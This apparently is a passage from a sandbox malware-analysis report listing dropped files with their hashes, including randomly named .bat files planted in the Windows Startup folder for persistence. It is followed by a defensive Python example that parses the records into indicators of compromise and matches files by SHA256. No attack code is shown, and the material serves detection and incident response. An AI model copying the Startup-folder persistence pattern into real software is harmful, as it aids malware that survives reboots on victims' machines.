SHA51221caf496d3f0977f30ce1007da4fd0256a04afa68928fae15e93da976038895bd9c1e665e96e17aa14bc0e530aad1ef3a6b74a55a898c22b9fbdcffbdf8a700f
-
Filesize
1.9MB
MD53960abf1cf1e42dee448bcd6d09381b1
SHA11c92cad57ae12fa79d31b3a61560c0ac82cdda24
SHA2569175e09343e8232774e9e74dc214ca5a1348ee88146ab9ea1f4c44d48905736c
SHA5129e72eb8035d578f3a473d8907d8058cd84eb7f8f1e8e9caa512a87aebbffce7a302af95a030a919408ac050d7fdd0f962e9c4f59ba89963508951ad546accfd9
-
Filesize
77B
MD555cc761bf3429324e5a0095cab002113
SHA12cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA51233f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155
-
Filesize1.2MB
MD5751f807e555a1c06dd2b8cb1f5297de8
SHA17e0af7a0df81bf657d7a46372cab7ead49efdc28
SHA25679a3d83590ba6ff505d255c855093cb41c1185c35e437bee3d2d8652a5839c3c
SHA51292ee075e84fa1a4e905e50f9ae8e13f62eeccbc786f31eb41595fe76cc9e99d1d32ab7bc0fc9c669355635f18bea9bc5822243c277ab8a1ddaac1a6f3ba7515a
-
Filesize1.1MB
MD5a2b2f656091bb79ee7eb0b611586dc48
SHA120a5125cbaa17ce8af0204d6a5bd5f3e3091d5d6
SHA256a56f88f780c62fee5b76c4f6e141eca1a89c1b0ee43bf8a47aaf604637b322ca
SHA512c0181120d0de96329eea40a5a051458c5a73853fd43c1fa51c5417ec10455c77354d3329d5176a3f6674a34de5ecf1212171a601b135fffd73042af6207e0165
-
Filesize860KB
MD51239dc413710dc3e6bbfcf32ffc33efd
SHA184d3773b02c6497bdd24b169c4c36d19d7875c9f
SHA25676b9870d934a7cfc3e40250ed18a84986a5f3fcae92679d0bd0e63a0861895f3
SHA512e54fd7492f69d8d56ce26fbeb29b25dcdf0acf817f504c8636517d2969ed37eac7179103caae6c546b0ff45ad8930993dbc7e1695e9becd3cbbbabbd50790ee3
-
Filesize1.2MB
MD547be4c368799211d8dda2f7c9a0e96bd
SHA1a1003e84583b81a88017d25f5df4879cb9d39ff3
SHA25671e172458d0c5a040b80db23b8cf03c967591d1c5c018bbb5eeabf40de755226
SHA512c45b28e139e372fa34c358c11c02616f606fac2dedec2c91237cce1c87a048a9a09e967ae913aaedf847ffa88712dcb871ea6e26950ecdc905c7b1d4aba54aa3
-
Filesize795KB
MD57a496d7595245941d996710655550f38
SHA15e413711837e98c9173b1ab22cb4df86ca00399f
SHA256ac01e3d6edc1cb762ea8851e0e05898a2572b973982f0d3a991f6a3ae80c0b83
SHA51214585a5a81a3089ec930ea38154fe609fba2b05d3f10619419c7d3a45d6c5370ae808b7f24f808c0ff4fed3b0673b0d842b13ead67d9f235264d5c81198e3d7e
-
Filesize835KB
MD530eac5d4c6b84099856e93d05529e3b8
SHA1abdae941bd97fdd3445f66b1e21461fc19d653aa
SHA256c27b8d60a49df50834fe4e2fa37c8221972d5b860f4f4a15b87f9e76cda4dc2c
SHA51288d5651ee8bdb1e70316c154c1478f59a7f2898bc22ad5ec004123ae49fe3c8e6f17bbd1e960698ea3a8ecd2f87161d8ef987fcc16b871dffb9ca4e556134fe1
-
Filesize270KB
MD5f48e89ca1c4ea9e1c5b935a5c94abf4e
SHA1cb565360bbc6a7172eb265a63644f61c9127d404
SHA256cb860a120cf487c8e738580622f3a8e9367e24c737d0501d28dcbcd98f69a8cc
SHA512aa15a00bf222fa7ca44d952a1e6a829346dcfecdf8443d27af0aac8607b00a4a033b59e69e911e51bb62acba1c929aac30678fe097ae1d6f18afb107223a6b46
-
Filesize709KB
MD5f3d5c951d70fe9039784f2313881ea17
SHA1f8e161f5b6c8c757bce9ec48e4b017e70cf248b2
SHA2562de360ce6affca2cd16ebd93aa2d86d813e6a0aed23f3455000f2f1f70745438
SHA512aa4f791b42fa26dfd4856e5d5e70fe2b81bee2dd13063dd1ef5f4d1e5c208aa91f49bea5478f28ba3582f1fdae2ddec1d0a9d90cd199e34403152b94f8bab06d
-
Filesize60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize690KB
MD5085aca27fe0b6d4c479500fb4a586129
SHA188e775fab99e3bc02e2bc44b0171b8a70cc5f9a3
SHA2566cdeb9602e2346ea8c4b86eaf32bf07dea3350a9fa4ae99f5c15fcde96055cb7
SHA512a7d37e57f1421a8b407204aad3089995dd2eb6fc03a37dbb0f2b8a3c387143f55e1e41c04059db265f330e96fd17d8d7c56bfc4398810b90b69cbe59e156339b
-
Filesize2KB
MD5a69559718ab506675e907fe49deb71e9
SHA1bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA2562f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63
-
Filesize22KB
MD592dc6ef532fbb4a5c3201469a5b5eb63
SHA13e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA2569884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA5129908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3
-
Filesize21KB
MD52b342079303895c50af8040a91f30f71
SHA1b11335e1cb8356d9c337cb89fe81d669a69de17e
SHA2562d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f
SHA512550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47
-
Filesize128KB
MD506547c4e7f6a5eccf596ef9bde38c879
SHA16cc766a0e632a3dc9cd025795432f6cb88a5b11f
SHA256c0da1b5bf7d838ef26aa4a183968c46334b6b4bbef6137f939ad9c0f8a67a8dd
SHA5125e3ab4d6749b2eb22f3285f7f01b5f795b1139016e7ee5790571506e79a185ac5d5912fb0d29d968e247213a0de468ec6d3d18a32a0e2343ed7d3905750cefd6
-
Filesize109KB
MD52afdbe3b99a4736083066a13e4b5d11a
SHA14d4856cf02b3123ac16e63d4a448cdbcb1633546
SHA2568d31b39170909595b518b1a03e9ec950540fabd545ed14817cac5c84b91599ee
SHA512d89b3c46854153e60e3fa825b394344eee33936d7dbf186af9d95c9adae54428609e3bf21a18d38fce3d96f3e0b8e4e0ed25cb5004fbe288de3aef3a85b1d93f
-
Filesize1.2MB
MD592fbdfccf6a63acef2743631d16652a7
SHA1971968b1378dd89d59d7f84bf92f16fc68664506
SHA256b4588feacc183cd5a089f9bb950827b75df04bd5a6e67c95ff258e4a34aa0d72
SHA512b8ea216d4a59d8858fd4128abb555f8dcf3acca9138e663b488f09dc5200db6dc11ecc235a355e801145bbbb44d7beac6147949d75d78b32fe9cfd2fa200d117
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KF9ZwM1htMp18z3Hvz5q82yB.bat
Filesize69B
MD53c955c21d82590ce0f5775333605aea4
SHA1ec557fef21418dac0f378527bfef7f9fce551d82
SHA25642b586538aabd51b5752087fbd843f5fc9e29f19954ba10fd14c542759af76ff
SHA512666951fd8ae11d8d57c2ba7b493f27f2d846b634cf234d5286af1d6c6b210ce04d7d57727d4ab7c8d732b11541cf67a352048826390f28d553e4107154b67fd3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KJ7YeE2j2u6MjBVRbzctBXge.bat
Filesize69B
MD50e097974f9cf81dcfbad4b42dc3f5fdc
SHA1c15e2fb7203a69eb656a3549ccd256ab114f167d
SHA256f18e22da6f5cfad6daa4731d6cb62e755afc33e7d7243e3d7afb1f3da62db2d5
SHA5127fa687a885943b2a68500e96c0411e34c2bc11e7d1f999a5675c721b7e7127b7ae09aa05121791ac350460d67910ffbd95cea1f1a88b0dba3733f31ac361d249
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\auGVM38sZMaymz2pA3UtXgzI.bat
Filesize69B
MD5035d24297bdff3dc0c13784fd84c65ae
SHA1f8a5841212cd7eb6dfd5505ff91da5f9c9cb96e7
SHA2566eeba4ac4373f638199ab856ba7c6a110fa5ae15f452ff6f2c28965f9822d676
SHA5120a6c47d712bf1a5adb8ba56b93ebbde4878985db2d9f411083d80030ef80b36b53faf49c462482d99d6d7daf567a2ab63da77613c50969963320b982b60b8288
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fG6Eq6XzP5233KSsUEpsaRC8.bat
Filesize90B
MD5cc604d2e313d396fe041d0bf0ae1fc48
SHA1f6fa21744ab4475de5dc41ea67896efffb03690d
SHA256cef850d8b07a9129678b47ef3ea334fd80043fb6de765aeb99de4e2d110a243a
SHA512ab789e2169aec45ff40c73344228f134968f93c8f0637e00dbfde42a08522e36fafabdd8fce9d0859b79cc97b61aca432eadb90e1137c6cb6d4eec0c14540fd9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ksGwX541NFYLLQyfzzA31AQ8.bat
Filesize69B
MD51e85febaa4a8c9ac8c3cd907e16c20a8
SHA16d90439de1e1b00fc787b63d98370d3536b49143
SHA256ebf81ddb93c19f9d8534d6797b38630d24028dc11e4017395c32ae8b603965c6
SHA512a05b0b564dcc2e1c9fbe636430c2a1c1af3ff2e2483ab0524cb08f0d13f515fdb6f04a688f1b57508e693fef04651582cefad017790e133917b7a86151ae265a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rNkuvk8Zg4i325fSyIYGB9Wt.bat
Filesize69B
MD5f16f0bf75c7403fe67143dbaba918a7a
SHA1ee23afe5a38297bd1c46eb2578dceb6f37842dc4
SHA25653bee342d3eac9384220131e8b151aba543296cb7062c6d62323b6077324b5e3
SHA512617ec4d1d57a01974fecf5d28d6063e8605c0f600bb350074255b437ae0579ca7b6620169b05dde7c624cbe18eb81aed4d312d921f87d1abc8c5589a91f047ae
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sjbOP8xnNE7tcTgPiGZ6wwas.bat
Filesize69B
MD560159e8f2e56c15793b4dc44ddb8da0d
SHA1c23fd4a88bf4e329c88bf1266e46d5f231fd1873
SHA256fc6b5481f6b2ee09a07a6983aa7f4eec978815552f6ba2f7024d02cc37bf577a
SHA512f16db3e564591f181cd8b377d95a299110bbbe1c33f577141c038d5bc82562a9103c636efaf0c0b976e9e1a7b0b35b066ff48750098613f10c160b3b1e25b8c0
-
Filesize40B
MD57cbeb7a0a52eb0eef9cc2af0df1e5c6e
SHA1e170c47aee7d0ba53aada63abd23ebf7ad2b7aca
SHA2562c3a3665875f55a59429b43557637f26df5a7b5a9de9ea7cb7d86d34eee3ef06
SHA51269316f78d9c77fbc9b317a479268cdd3c42f21be1a00278059c1232168297955f067fa35e20512dbe347c2b851ebaa8f32c9d31faa9351afa434c5ada8cb0910
-
Filesize128B
MD511bb3db51f701d4e42d3287f71a6a43e
SHA163a4ee82223be6a62d04bdfe40ef8ba91ae49a86
SHA2566be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331
SHA512907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2
-
Filesize64KB
MD5e17809a33f8d4598ff20a11a5c9bac14
SHA1500a8ec2399d8527d3ff63269bb664c59f8a943c
SHA256c92d1e6f943ccba40e8fe062a0aa09897d1d044fa9fd4bc9a08403aeefb5e127
SHA51285bf790e364424c149f18365154770af59d95745c0252ada89e8085d8d6374a73c6579e0ad7f934cacea69078c0c2f50cfd31cb978333a2d3162f47d71c5114b
-
Filesize1.1MB
MD5ae33ba35e86d927baeeb7acc504ea488
SHA17e7860f439a45aaaef052b4c52b2dd0fb0e05254
SHA256b0f85b6a6bdc99b269df7eb4bd1b02c56c806d11d677527d49511db4e955e0dc
SHA512c727800c8952c8e98de8d2ccc3d3bc131e077563624746540081d3e3488e230adf7bced3eff8efe46ec9dd30b2dac90ef5e89fcd34ae981c16f507e7ee3cfad8
-
Filesize1024KB
MD56440c777facbd16e27716a2baefcf245
SHA13b88ad41fc8bc48345a48e58150dbca9e9d1d38e
SHA25649d08aa85f37448eb8c25be8dffc4337db57541d1adeb1b81b37b86c871edca8
SHA512a27c9583aeea87991eeb2691b55013c2fd9cc326deba3039ec672e858e9830abea69203a5e9492ada0fc3c9e1cee8b3d585c06cc3b944b35be1fc6739bfc4570
-
Filesize4.1MB
MD54191742345fddf94e5a0aaa6954dc062
SHA14ccb36032981b6f3c364b0631c9b11e19f4afe59
SHA256f42c0580e4dde5bcbafd4b011bb6230332893c2d9d2b394849747fd073da9a11
SHA512eb83c2ebf918a211230b4f5c1a61fd5f0e7ca8091d1406159357ccc09ee3af7a1ac7ef4c5c16c8f22ee888a96d5eb2c24da6563eca1510b12201877a2b414339
-
Filesize1.6MB
MD53fb951ea947bb9cbf50c1edbac2a14bd
SHA16a37c027e16b19735a9f8c934be5ef42c107fa8f
SHA2563f29f1a3f20b52bed9ba66967b0909ba72c6dd98131156c8fef50b9df12fef08
SHA512e9a4826f63808d5aaedf6d895dfd76b5208317f1dab36325cafd095c2c8952c587656651703bd7281adcfe5e0e079b68e9d066e05f129735a10d2d40cec9cb97
-
Filesize512KB
MD5c878c5ba66dc1d22dcbd284a4f9972cb
SHA1909c76c6285395bec5969f3c401bd2ada0bb76c6
SHA2565bbb1783364d1df6f5bae96cf673d659fc3d93175f3f5a9764fe5134a1d37071
SHA512fedc42994f07f46199d0f6898c76131132e49c1b2399266ca8a3ae112d0263a244086876bdcc94383f2691d6f7249566bcfe706c5189a7b4605ec99222093f14
-
Filesize425KB
MD5bcd2b9aec7395eadf9810db8553c3742
SHA17498390fe76cdb8200ec8413e56cafc2e96db396
SHA256d0810b74655185eff13f1fd4005b04cf6e30b866601543c116bce7d6cc9e16a5
SHA512ba69bdd35459b6081868bb9337318e62e334c49fbc9ec82b94c88ad8241cecb1480651af5e362ef0bcff3b01dd751951e8bba1fefa8b4df746ac39f34408152a
-
Filesize704KB
MD511551980d9e25f193459f7c8f37e0b4c
SHA10a221b8a8da7496937b7a8b352d388b2e7c1fdd5
SHA256b02940c29fc8822dd5cc207ddd4d88fde747df0a372b09da42ba0b967b69ac6d
SHA51250894589e0a75addfe6e06d8086ff368bb04efa7b1f1af9840b05a1c119f41069266c3ef269192b9f0da1c3ac69ea808e948052b91c173e97fad30eff87cf59e
-
Filesize320KB
MD562d7423c6b213fd9e638c5dd238c7a14
SHA1da25fefff45c8e9c7870eca589c22750fa78e5e0
SHA256cbce06fda6c76180c370d7264ceb3a0869a849b13fbde0f80ead5037719667f2
SHA5127f11278351f565549f70e95958ae466ecc29c4dacd03095b9e9f6e341bb16b9ffaf8d6ff5a5f49f37d8ce6e3065ca0e0f5735d71ee160c81d63d7e591bd2c0f2
-
Filesize7KB
MD55b423612b36cde7f2745455c5dd82577
SHA10187c7c80743b44e9e0c193e993294e3b969cc3d
SHA256e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09
SHA512c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c
-
Filesize1.4MB
MD5209dc8a3285be339f799ecf68af756ee
SHA164f36146d2328c75b93f9f0c1a09bbd9e4819b02
SHA2565ee818f21a98ddd88f5f71bd32cda367bb29e2c843504238dad1b029bc5560d1
SHA51251b260c915ddf2a42077274fa7517bb7f3890333a9e19dd2cf549f74d21c15b42a97af0e7956c144e6c0547a76061234b0a70341184abd7ff4c793659cadd77e
-
Filesize1.5MB
MD50467da48f0ea43c554f2145bbc2126c0
SHA18e96085657e9413243b79584e94c15f3469c1332
SHA25614f2ecf9ce38ce0d9cad57385182923dac67ca10c19a21aaa937ac461aafde0d
SHA512383878c2baeb863de62fbee4580a476e7fe0a4e720d91f49e3e35cc82bf5ce30fc3f3ebb7361ac78212c92f0b574402a10f806ab2b3e954fb94d09f12cf03a05
-
Filesize768KB
MD57b1eb010cfc069f2d7dd46260304c160
SHA153a617c43528a1ce8d77c6ddc280161f158b6d4f
SHA2566c11669e41ea8279952b4654c28070a0441446776fc4f0150026e676976cc727
SHA512eb2855beb230fab19faca10db06f3f3da277cde9dc65ecec6f0510f5b83575d40e628e1bec24f9e4165c0e796d98962f6882e7f1c24afa89aec2af045b2b74bb
-
Filesize1.7MB
MD546236290b507992078fc08ffe23b6fa1
SHA153f0e71134d94cfd2af1e8f5f46783d7d0dd9d83
SHA256f283aabc6064c77aec8449954c58fbf173c1bc357b9744755f7eba59fe6aae4a
SHA5121102d953a6d33d1b2801a473be2d17e0be935de19732bd7ffefe42f371233af8071b85ab8b8949949600a1f865d55699cebd9569f91998c0d21b9f5fbf6871d7
-
Filesize1.0MB
MD581ff2efaaf60ac3c1aeacf8ba36d8efd
SHA17c1bdd549fd651c061a5e226d9653c423439c9b1
SHA2562940974512c23ddb3880b18e14f6f9e902c32bae07645c369e54b1cccf1fff6f
SHA512da39aefdc1cc78a55b89ca3b7d8147e4331d0fa6554b88747a54b35a3409b84e6bb76df59049dfea689016d78551b74d0688a268b2adfe16eb0aff2dea936ca1
-
Filesize1.4MB
MD5f9322a5b8644ec473d8afef499e12a1f
SHA1a188c6ce02ba619f30a57fc1760ea31a25d40d2c
SHA25665b097d5c92cc577cb8c1c1631a8481ac1e9fbf19520b51868d939e144b581f3
SHA5120300b515e98df1be176de6e7c279023264fca795a7c45a451c7e6f1ae84376751c6a24913f93cc65ba2689c71537a2ab8f6f21119a5f973425bb2ce4512ab7c3
-
Filesize1.4MB
MD5865615f5a3e61188faac15d839a2bb09
SHA13499d54bfdeaef09a307e6ca4b6425f83b056ee9
SHA256cc13b18d0a3b19311b32a773fa6a9ab1511fd96fc61d92178c7d393ebf5801f4
SHA51222b2890d7c1af8953d74aef14d666be57c433023d507eb9f0f2644ccb813cc6e1c057f8fcbc4ae7bf2827a43affe4c53ee3c6d142de2c1b69330e60bcf072b53
-
Filesize328KB
MD572d7a508cefa8cc8ca907dfdfd5e358e
SHA167beeb7ada963cf399846431d1500b5dce3b093d
SHA25631ae0890463455f091b1b0df75bfbbed7876dcbabee58f5f424027f338e1d1bc
SHA512a391b9e3b937cb0f99f1eb206248a4da08ed97623edf62a5c322a9fa6658e087ddaa1a000327874ccdff70b6c01322d7edd533c93a52392708ebad1bf4c8a77a
-
Filesize65KB
MD5b960c89872443eed2a1eed5acd9b4696
SHA1ba2e42c70c473c2a6ee2fa10e12249aeae20f286
SHA256e87d0cb5cfd84f416ed841b68af47dfbfef0a972c4f8ef02b136ac2efd80e2ce
SHA5124b49c4ef6d65a43ba0f1ec0576c89b1ab7b301a3ce9736b411f0cda11b2d6a2c7d4f666f24ebf56692df0437f3ee401d7997b82f25fd02ef12e1f3339bed4eff
-
Filesize172KB
MD538783b735530ec3595f8cfc57704e0a4
SHA1297d2424423506702a6f42fff06b37a89a9fc8e6
SHA25695d772adaee04f58f13c59ab65bcbefe9d6d6b2fc9b0f5fb6b4304902c5b2a8d
SHA512980ff17ecdd36f1efbaced0b9599d4032eb4b27d5836c7d9d26828e478a75c73f4604bb568052aacc7519a54feb517efbf475e4d2610d8af6dbd4d6afb45fb4f
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize3KB
MD500930b40cba79465b7a38ed0449d1449
SHA14b25a89ee28b20ba162f23772ddaf017669092a5
SHA256eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62
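The dropped-file records above are only useful once they can be turned into something a host or a log pipeline can be checked against. What follows is an added example, not part of the sandbox report or of any tool it names: it parses this Filesize / MD5 / SHA1 / SHA256 / SHA512 record format into structured IOC records, rejects malformed digests, groups records by path so that a path written more than once during the run (the two dbghelp.dll entries above, 1.5MB and then 1.3MB with different hashes) is surfaced as two distinct binaries to hunt for, and matches a file's bytes against the set by SHA256. Sandbox exports sometimes fuse the label to its value ("Filesize1.5MB") and sometimes leave the value on the following line, so the parser accepts both. The embedded sample is three records copied from this listing, with the third record's Filesize label left on its own line; the function and class names are this example's own.

```python
"""Added example: parse a sandbox dropped-file listing into checkable IOCs."""
import hashlib
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
# A label is either fused to its value ("MD5bfeb...") or stands alone with
# the value on the next line ("Filesize" / "448KB"); group 2 is empty then.
LABEL_RE = re.compile(r"^(Filesize|MD5|SHA1|SHA256|SHA512)(.*)$")

# Three records copied from the listing above: the same dbghelp.dll path
# written twice with different contents, then a record that has no path.
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbghelp.dll
Filesize1.5MB
MD5bfeb92b427ed6d61a15de77c52d5b361
SHA119e8a46b84041f30279a3470765d027279dde58e
SHA256d7f1d277b2493e73efeec2f396907bf6eb2d7da2b04d940801cc62486d2c0533
SHA5123274a96a7a78d7468c698aedf9829983afc6eed67a20a4ee9b3fb9a95e6e23af2be422c151d0b3a7c47eaec68719d27c516130d909dda16abe73fdf5494a8479
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbghelp.dll
Filesize1.3MB
MD56ee8b6a773f68a59355ce01c8466b2ff
SHA188cd545c2b9cc8f497e9f838d1dcbd029a753689
SHA2560734fa38d671afe3b31989f8fc560320269a9aab00a60458aada68366758dff9
SHA5125f2b88e257afebc8a274038940a47af9af1b301d2ffaf2df8105ad5140af9379c08024931b6f4202da9cc2f4b16dbee25e37f21e11f40fea956f2c0dc93278b0
-
Filesize
448KB
MD5db04f566eaffca5474d03ead0a08a16a
SHA1898508ca54f12193cc1e3085b2debfb4f23f7cde
SHA25614a1853237ca0895d78461ee94572b6d7e56e4f3f6e1d692b824ac904aea09a0
SHA51221caf496d3f0977f30ce1007da4fd0256a04afa68928fae15e93da976038895bd9c1e665e96e17aa14bc0e530aad1ef3a6b74a55a898c22b9fbdcffbdf8a700f
-
"""


@dataclass
class Dropped:
    """One dropped-file record; path is None when the listing gives none."""
    path: Optional[str] = None
    size: Optional[str] = None
    hashes: Dict[str, str] = field(default_factory=dict)


def _store(rec: Dropped, label: str, value: str) -> None:
    """Attach a field to the record, refusing digests of the wrong shape."""
    value = value.strip()
    if label == "Filesize":
        rec.size = value
        return
    if len(value) != HASH_LEN[label] or not re.fullmatch(r"[0-9a-fA-F]+", value):
        raise ValueError(f"{label} value {value!r} is not a {HASH_LEN[label]}-hex-digit digest")
    rec.hashes[label] = value.lower()


def parse_listing(text: str) -> List[Dropped]:
    """Split the listing on '-' separators and collect one record per block."""
    records: List[Dropped] = []
    cur, pending = Dropped(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "-":                      # record separator
            if cur.hashes or cur.path:
                records.append(cur)
            cur, pending = Dropped(), None
            continue
        if pending is not None:              # value for a bare label on the previous line
            _store(cur, pending, line)
            pending = None
            continue
        m = LABEL_RE.match(line)
        if m is None:
            cur.path = line                  # any non-label line is the dropped path
        elif m.group(2).strip():
            _store(cur, m.group(1), m.group(2))
        else:
            pending = m.group(1)
    if cur.hashes or cur.path:
        records.append(cur)
    return records


def paths_with_multiple_hashes(records: List[Dropped]) -> Dict[str, Set[str]]:
    """Paths that were written more than once with different contents."""
    by_path: Dict[str, Set[str]] = defaultdict(set)
    for rec in records:
        if rec.path and "SHA256" in rec.hashes:
            by_path[rec.path].add(rec.hashes["SHA256"])
    return {p: s for p, s in by_path.items() if len(s) > 1}


def match_bytes(data: bytes, records: List[Dropped]) -> Optional[Dropped]:
    """Return the record whose SHA256 matches the given file contents, or None."""
    digest = hashlib.sha256(data).hexdigest()
    return next((r for r in records if r.hashes.get("SHA256") == digest), None)
```

Match on the SHA256, not on the path: the Opera package directory name above carries a per-run timestamp and the Startup .bat file names are random, so the paths will differ on another host. The seven Startup .bat files are also tiny (69B to 90B) and all have different hashes, so on another host it is the contents of that Startup folder, rather than these particular digests, that should be checked.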